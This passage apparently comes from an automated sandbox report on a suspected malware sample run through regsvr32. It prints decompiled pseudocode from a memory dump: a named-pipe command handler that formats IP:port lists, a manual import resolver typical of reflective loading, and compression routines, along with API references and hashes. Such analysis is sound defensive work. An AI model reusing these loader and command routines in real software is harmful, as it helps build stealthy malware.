                                                                                                                                                                                              							if(_t81 == 0) {
                                                                                                                                                                                              								E04B00962( &_v200);
                                                                                                                                                                                              								L12:
                                                                                                                                                                                              								_t84 =  &_v200;
                                                                                                                                                                                              								L13:
                                                                                                                                                                                              								_push(4);
                                                                                                                                                                                              								L14:
                                                                                                                                                                                              								_push(_t84);
                                                                                                                                                                                              								_push(5);
                                                                                                                                                                                              								L31:
                                                                                                                                                                                              								_pop(_t187);
                                                                                                                                                                                              								E04AFD1A6(_t187);
                                                                                                                                                                                              								L32:
                                                                                                                                                                                              								L56:
                                                                                                                                                                                              								DisconnectNamedPipe( *0x4b0f804);
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								_pop(0);
                                                                                                                                                                                              								if(_v172 == 0) {
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								break;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t87 = _t81;
                                                                                                                                                                                              							__eflags = _t87;
                                                                                                                                                                                              							if(_t87 == 0) {
                                                                                                                                                                                              								_v204 = 0;
                                                                                                                                                                                              								_t88 = E04AF171A( &_v204, _t221);
                                                                                                                                                                                              								_v188 = _t88;
                                                                                                                                                                                              								__eflags = _t88;
                                                                                                                                                                                              								if(_t88 == 0) {
                                                                                                                                                                                              									_push(4);
                                                                                                                                                                                              									_v192 = 0;
                                                                                                                                                                                              									_push( &_v192);
                                                                                                                                                                                              									L19:
                                                                                                                                                                                              									_push(0xa);
                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t146 = _v204;
                                                                                                                                                                                              								_t90 = _t146 * 0x16;
                                                                                                                                                                                              								_v184 = _t146 * 0x16;
                                                                                                                                                                                              								_t203 = E04AF8BDE(_t90);
                                                                                                                                                                                              								_v192 = _t203;
                                                                                                                                                                                              								__eflags = _t203;
                                                                                                                                                                                              								if(_t203 == 0) {
                                                                                                                                                                                              									_t64 =  &_v192;
                                                                                                                                                                                              									 *_t64 = _v192 & 0x00000000;
                                                                                                                                                                                              									__eflags =  *_t64;
                                                                                                                                                                                              									_push(4);
                                                                                                                                                                                              									_push( &_v192);
                                                                                                                                                                                              									_t188 = 0xa;
                                                                                                                                                                                              									E04AFD1A6(_t188);
                                                                                                                                                                                              									L52:
                                                                                                                                                                                              									E04AF8BF4( &_v188, _t146);
                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t199 = 0;
                                                                                                                                                                                              								__eflags = _t146;
                                                                                                                                                                                              								if(_t146 == 0) {
                                                                                                                                                                                              									L50:
                                                                                                                                                                                              									_push(E04AFA43D(_t203));
                                                                                                                                                                                              									_push(_t203);
                                                                                                                                                                                              									_t189 = 5;
                                                                                                                                                                                              									E04AFD1A6(_t189);
                                                                                                                                                                                              									E04AF8BF4( &_v192, 0xffffffff);
                                                                                                                                                                                              									_t208 = _t208 + 0x10;
                                                                                                                                                                                              									goto L52;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t159 = _v188 + 4;
                                                                                                                                                                                              								__eflags = _t159;
                                                                                                                                                                                              								_v204 = _t159;
                                                                                                                                                                                              								do {
                                                                                                                                                                                              									__eflags = _t199;
                                                                                                                                                                                              									if(_t199 != 0) {
                                                                                                                                                                                              										__eflags = _t199 - _t146 - 1;
                                                                                                                                                                                              										if(_t199 < _t146 - 1) {
                                                                                                                                                                                              											_t102 = E04AFA43D(_t203);
                                                                                                                                                                                              											_t159 = _v204;
                                                                                                                                                                                              											 *((short*)(_t102 + _t203)) = 0x3b;
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t100 =  *_t159;
                                                                                                                                                                                              									_v196 = _t100;
                                                                                                                                                                                              									__eflags = _t100;
                                                                                                                                                                                              									if(_t100 != 0) {
                                                                                                                                                                                              										_t103 = E04AFA43D(_t203);
                                                                                                                                                                                              										_t104 = _v204;
                                                                                                                                                                                              										_push(_t104[1] & 0x0000ffff);
                                                                                                                                                                                              										_push( *_t104 >> 0x18);
                                                                                                                                                                                              										_push(_t104[0] & 0x000000ff);
                                                                                                                                                                                              										_push(_t104[0] & 0x000000ff);
                                                                                                                                                                                              										_t110 = E04AFA43D(_t203) + _t203;
                                                                                                                                                                                              										__eflags = _t110;
                                                                                                                                                                                              										E04AF9E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
                                                                                                                                                                                              										_t159 = _v204;
                                                                                                                                                                                              										_t208 = _t208 + 0x20;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t199 = _t199 + 1;
                                                                                                                                                                                              									_t159 = _t159 + 0x20;
                                                                                                                                                                                              									_v204 = _t159;
                                                                                                                                                                                              									__eflags = _t199 - _t146;
                                                                                                                                                                                              								} while (_t199 < _t146);
                                                                                                                                                                                              								goto L50;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t87 != 1;
                                                                                                                                                                                              							if(_t87 != 1) {
                                                                                                                                                                                              								goto L56;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = 0;
                                                                                                                                                                                              							_t113 = E04AF171A( &_v204, _t221);
                                                                                                                                                                                              							_t204 = _v204;
                                                                                                                                                                                              							_v196 = _t113;
                                                                                                                                                                                              							__eflags = _t113;
                                                                                                                                                                                              							if(_t113 != 0) {
                                                                                                                                                                                              								E04AF8BF4( &_v196, _t204);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = _t204 * 0x16;
                                                                                                                                                                                              							_t84 =  &_v204;
                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t214 == 0) {
                                                                                                                                                                                              							_t84 = E04B00962( &_v200);
                                                                                                                                                                                              							L16:
                                                                                                                                                                                              							__eflags = _t84;
                                                                                                                                                                                              							if(_t84 == 0) {
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								goto L19;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_push(_v200);
                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t118 = _t80 - 1;
                                                                                                                                                                                              						if(_t118 == 0) {
                                                                                                                                                                                              							_t200 = E04AF9B33( &(_t149[4]), 0x20, 1,  &_v176);
                                                                                                                                                                                              							_v196 = _t200;
                                                                                                                                                                                              							__eflags = _t200;
                                                                                                                                                                                              							if(_t200 == 0) {
                                                                                                                                                                                              								L30:
                                                                                                                                                                                              								_t192 =  *0x4b0f8bc; // 0x0
                                                                                                                                                                                              								E04AF9EDB( &_v164,  &(_t192[4]), 0x80);
                                                                                                                                                                                              								_push(0x84);
                                                                                                                                                                                              								_push( &_v168);
                                                                                                                                                                                              								_push(2);
                                                                                                                                                                                              								goto L31;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t205 = _v176;
                                                                                                                                                                                              							__eflags = _t205 - 1;
                                                                                                                                                                                              							if(__eflags <= 0) {
                                                                                                                                                                                              								_t124 = E04AF1DD3(E04AF9F6F( *_t200, __eflags), 0, 0, 0);
                                                                                                                                                                                              								_t208 = _t208 + 0x10;
                                                                                                                                                                                              								_v168 = _t124;
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t125 = _t205 - 1;
                                                                                                                                                                                              							_v184 = _t205 - 1;
                                                                                                                                                                                              							_t127 = E04AF8BDE(_t125 << 2);
                                                                                                                                                                                              							_v188 = _t127;
                                                                                                                                                                                              							__eflags = _t127;
                                                                                                                                                                                              							if(_t127 == 0) {
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t148 = 1;
                                                                                                                                                                                              							__eflags = _t205 - 1;
                                                                                                                                                                                              							if(__eflags <= 0) {
                                                                                                                                                                                              								L28:
                                                                                                                                                                                              								_t129 = E04AF1DD3(E04AF9F6F( *_t200, __eflags), _t127, _v184, 0);
                                                                                                                                                                                              								_t208 = _t208 + 0x10;
                                                                                                                                                                                              								_v168 = _t129;
                                                                                                                                                                                              								E04AF9C2C( &_v176);
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = _t127;
                                                                                                                                                                                              							do {
                                                                                                                                                                                              								_t132 = E04AF9880( *((intOrPtr*)(_t200 + _t148 * 4)), E04AFA43D( *((intOrPtr*)(_t200 + _t148 * 4))));
                                                                                                                                                                                              								_t183 = _v204;
                                                                                                                                                                                              								_t148 = _t148 + 1;
                                                                                                                                                                                              								 *_t183 = _t132;
                                                                                                                                                                                              								_v204 = _t183 + 4;
                                                                                                                                                                                              								__eflags = _t148 - _t205;
                                                                                                                                                                                              							} while (__eflags < 0);
                                                                                                                                                                                              							_t127 = _v188;
                                                                                                                                                                                              							goto L28;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t133 = _t118 - 3;
                                                                                                                                                                                              						if(_t133 == 0) {
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_t196 = 5;
                                                                                                                                                                                              							E04AF5EC3(E04AFD1A6(_t196));
                                                                                                                                                                                              							_v172 = 1;
                                                                                                                                                                                              							goto L56;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t137 = _t133;
                                                                                                                                                                                              						if(_t137 == 0) {
                                                                                                                                                                                              							_t84 = E04B00940( &_v200);
                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t137 != 1) {
                                                                                                                                                                                              							goto L56;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E04B00940( &_v200);
                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}
                                                                                                                                                                                              0x04af3af7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af37f8
                                                                                                                                                                                              0x04af37f8
                                                                                                                                                                                              0x04af37fe
                                                                                                                                                                                              0x04af3801
                                                                                                                                                                                              0x04af3804
                                                                                                                                                                                              0x04af3976
                                                                                                                                                                                              0x04af3976
                                                                                                                                                                                              0x04af3979
                                                                                                                                                                                              0x04af3aed
                                                                                                                                                                                              0x04af3833
                                                                                                                                                                                              0x04af3834
                                                                                                                                                                                              0x04af3838
                                                                                                                                                                                              0x04af3838
                                                                                                                                                                                              0x04af383a
                                                                                                                                                                                              0x04af383a
                                                                                                                                                                                              0x04af383b
                                                                                                                                                                                              0x04af395a
                                                                                                                                                                                              0x04af395a
                                                                                                                                                                                              0x04af395b
                                                                                                                                                                                              0x04af3960
                                                                                                                                                                                              0x04af3afd
                                                                                                                                                                                              0x04af3b03
                                                                                                                                                                                              0x04af3b0e
                                                                                                                                                                                              0x04af3b10
                                                                                                                                                                                              0x04af3b11
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3b11
                                                                                                                                                                                              0x04af3980
                                                                                                                                                                                              0x04af3980
                                                                                                                                                                                              0x04af3983
                                                                                                                                                                                              0x04af39c8
                                                                                                                                                                                              0x04af39cc
                                                                                                                                                                                              0x04af39d1
                                                                                                                                                                                              0x04af39d5
                                                                                                                                                                                              0x04af39d7
                                                                                                                                                                                              0x04af3ad8
                                                                                                                                                                                              0x04af3ade
                                                                                                                                                                                              0x04af3ae2
                                                                                                                                                                                              0x04af3859
                                                                                                                                                                                              0x04af3859
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3859
                                                                                                                                                                                              0x04af39dd
                                                                                                                                                                                              0x04af39e1
                                                                                                                                                                                              0x04af39e5
                                                                                                                                                                                              0x04af39ee
                                                                                                                                                                                              0x04af39f0
                                                                                                                                                                                              0x04af39f5
                                                                                                                                                                                              0x04af39f7
                                                                                                                                                                                              0x04af3ab2
                                                                                                                                                                                              0x04af3ab2
                                                                                                                                                                                              0x04af3ab2
                                                                                                                                                                                              0x04af3abb
                                                                                                                                                                                              0x04af3abd
                                                                                                                                                                                              0x04af3ac0
                                                                                                                                                                                              0x04af3ac1
                                                                                                                                                                                              0x04af3ac8
                                                                                                                                                                                              0x04af3ace
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3ace
                                                                                                                                                                                              0x04af39fd
                                                                                                                                                                                              0x04af39ff
                                                                                                                                                                                              0x04af3a01
                                                                                                                                                                                              0x04af3a90
                                                                                                                                                                                              0x04af3a97
                                                                                                                                                                                              0x04af3a98
                                                                                                                                                                                              0x04af3a9b
                                                                                                                                                                                              0x04af3a9c
                                                                                                                                                                                              0x04af3aa8
                                                                                                                                                                                              0x04af3aad
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3aad
                                                                                                                                                                                              0x04af3a0b
                                                                                                                                                                                              0x04af3a0b
                                                                                                                                                                                              0x04af3a0e
                                                                                                                                                                                              0x04af3a12
                                                                                                                                                                                              0x04af3a12
                                                                                                                                                                                              0x04af3a14
                                                                                                                                                                                              0x04af3a19
                                                                                                                                                                                              0x04af3a1b
                                                                                                                                                                                              0x04af3a1e
                                                                                                                                                                                              0x04af3a24
                                                                                                                                                                                              0x04af3a28
                                                                                                                                                                                              0x04af3a28
                                                                                                                                                                                              0x04af3a1b
                                                                                                                                                                                              0x04af3a2e
                                                                                                                                                                                              0x04af3a30
                                                                                                                                                                                              0x04af3a34
                                                                                                                                                                                              0x04af3a36
                                                                                                                                                                                              0x04af3a39
                                                                                                                                                                                              0x04af3a40
                                                                                                                                                                                              0x04af3a49
                                                                                                                                                                                              0x04af3a4f
                                                                                                                                                                                              0x04af3a54
                                                                                                                                                                                              0x04af3a5d
                                                                                                                                                                                              0x04af3a75
                                                                                                                                                                                              0x04af3a75
                                                                                                                                                                                              0x04af3a78
                                                                                                                                                                                              0x04af3a7d
                                                                                                                                                                                              0x04af3a81
                                                                                                                                                                                              0x04af3a81
                                                                                                                                                                                              0x04af3a84
                                                                                                                                                                                              0x04af3a85
                                                                                                                                                                                              0x04af3a88
                                                                                                                                                                                              0x04af3a8c
                                                                                                                                                                                              0x04af3a8c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3a12
                                                                                                                                                                                              0x04af3985
                                                                                                                                                                                              0x04af3988
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3992
                                                                                                                                                                                              0x04af3996
                                                                                                                                                                                              0x04af399b
                                                                                                                                                                                              0x04af399f
                                                                                                                                                                                              0x04af39a3
                                                                                                                                                                                              0x04af39a5
                                                                                                                                                                                              0x04af39ad
                                                                                                                                                                                              0x04af39b3
                                                                                                                                                                                              0x04af39b7
                                                                                                                                                                                              0x04af39bb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af39bb
                                                                                                                                                                                              0x04af380a
                                                                                                                                                                                              0x04af396c
                                                                                                                                                                                              0x04af384c
                                                                                                                                                                                              0x04af384d
                                                                                                                                                                                              0x04af384f
                                                                                                                                                                                              0x04af3857
                                                                                                                                                                                              0x04af3858
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3858
                                                                                                                                                                                              0x04af3851
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3851

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 04AF37B2
                                                                                                                                                                                                • Part of subcall function 04AFD1A6: FlushFileBuffers.KERNEL32(00000000,?,04AF3AC6,00000000,00000004), ref: 04AFD1EC
                                                                                                                                                                                              • DisconnectNamedPipe.KERNEL32 ref: 04AF3B03
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                                              • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                                              • API String ID: 465096328-3858738763
                                                                                                                                                                                              • Opcode ID: 760b3c264ac0d8b6b1d87e23979eea38b9818142bb6d32ed3459fa65ab20067a
                                                                                                                                                                                              • Instruction ID: 6fb3c8b65d631f3339418d5bac79ff77799b4051c1d5d3efa1615d850d67fb2f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 760b3c264ac0d8b6b1d87e23979eea38b9818142bb6d32ed3459fa65ab20067a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AA1E4B1608301AFE714EFA5DD84E6BB7E8EB84314F40891EFB5597280EB34E944CB51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E04B0370B(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                              				intOrPtr* _v8;
                                                                                                                                                                                              				signed int* _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				struct HINSTANCE__* _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				signed int _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				signed int _v64;
                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                              				signed int _t112;
                                                                                                                                                                                              				signed int _t115;
                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                              				void* _t167;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t167 = __ecx;
                                                                                                                                                                                              				_v44 = _v44 & 0x00000000;
                                                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                                                              					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                              					_v40 = E04AFEFA7(_t167, _v48, "GetProcAddress");
                                                                                                                                                                                              					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                              					_v32 = _v52;
                                                                                                                                                                                              					_t109 = 8;
                                                                                                                                                                                              					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                                              						L24:
                                                                                                                                                                                              						return 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v56 = 0x80000000;
                                                                                                                                                                                              					_t112 = 8;
                                                                                                                                                                                              					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                                              					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                              						_v8 = _v8 + 0x14;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t115 = 8;
                                                                                                                                                                                              					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                                              					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                              						_t34 = _v8 + 0xc; // 0xffff
                                                                                                                                                                                              						_v36 = LoadLibraryA( *_t34 + _a4);
                                                                                                                                                                                              						if(_v36 != 0) {
                                                                                                                                                                                              							if( *_v8 == 0) {
                                                                                                                                                                                              								_t43 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                              								_v12 =  *_t43 + _a4;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_v12 =  *_v8 + _a4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v28 = _v28 & 0x00000000;
                                                                                                                                                                                              							while( *_v12 != 0) {
                                                                                                                                                                                              								_v24 = _v24 & 0x00000000;
                                                                                                                                                                                              								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                              								_v64 = _v64 & 0x00000000;
                                                                                                                                                                                              								_v20 = _v20 & 0x00000000;
                                                                                                                                                                                              								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                                              									_v60 =  *_v12 + _a4;
                                                                                                                                                                                              									_v20 = _v60 + 2;
                                                                                                                                                                                              									_t73 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                              									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                                                                                                                                                                                              									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_v24 =  *_v12;
                                                                                                                                                                                              									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                                              									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if(_v24 != _v16) {
                                                                                                                                                                                              									_v44 = _v44 + 1;
                                                                                                                                                                                              									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                                              										 *_v12 = _v16;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t89 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                              										 *( *_t89 + _a4 + _v28) = _v16;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v12 =  &(_v12[1]);
                                                                                                                                                                                              								_v28 = _v28 + 4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v8 = _v8 + 0x14;
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t163 = 0xfffffffd;
                                                                                                                                                                                              						return _t163;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L24;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return __eax | 0xffffffff;
                                                                                                                                                                                              			}
























                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 04B03728
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 04B037C1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                              • API String ID: 4133054770-1584408056
                                                                                                                                                                                              • Opcode ID: baf2a4f5c5bc7b57107822705da8015579d154a0a26568773fe8a1369a778783
                                                                                                                                                                                              • Instruction ID: 443ed4ff96d4a4aa48e725857071abbc4ef6105336cd02c1c4afb21cb6f41c48
                                                                                                                                                                                              • Opcode Fuzzy Hash: baf2a4f5c5bc7b57107822705da8015579d154a0a26568773fe8a1369a778783
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E618EB5E10209EFDB10CF98C485BADBBF1FF48316F248599E815AB291D774AA80DF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                                                              			E04B04100(int _a4, signed int _a8) {
                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				void* _t137;
                                                                                                                                                                                              				signed int _t141;
                                                                                                                                                                                              				intOrPtr* _t142;
                                                                                                                                                                                              				signed int _t145;
                                                                                                                                                                                              				signed int _t146;
                                                                                                                                                                                              				intOrPtr _t151;
                                                                                                                                                                                              				intOrPtr _t161;
                                                                                                                                                                                              				intOrPtr _t162;
                                                                                                                                                                                              				intOrPtr _t167;
                                                                                                                                                                                              				intOrPtr _t170;
                                                                                                                                                                                              				signed int _t172;
                                                                                                                                                                                              				intOrPtr _t173;
                                                                                                                                                                                              				int _t184;
                                                                                                                                                                                              				intOrPtr _t185;
                                                                                                                                                                                              				intOrPtr _t188;
                                                                                                                                                                                              				signed int _t189;
                                                                                                                                                                                              				void* _t195;
                                                                                                                                                                                              				int _t202;
                                                                                                                                                                                              				int _t208;
                                                                                                                                                                                              				intOrPtr _t217;
                                                                                                                                                                                              				signed int _t218;
                                                                                                                                                                                              				int _t219;
                                                                                                                                                                                              				intOrPtr _t220;
                                                                                                                                                                                              				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xfed1e900
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0xbde85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E04B07120(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E04B05E80(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xbde85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E04B05FC0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8341ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
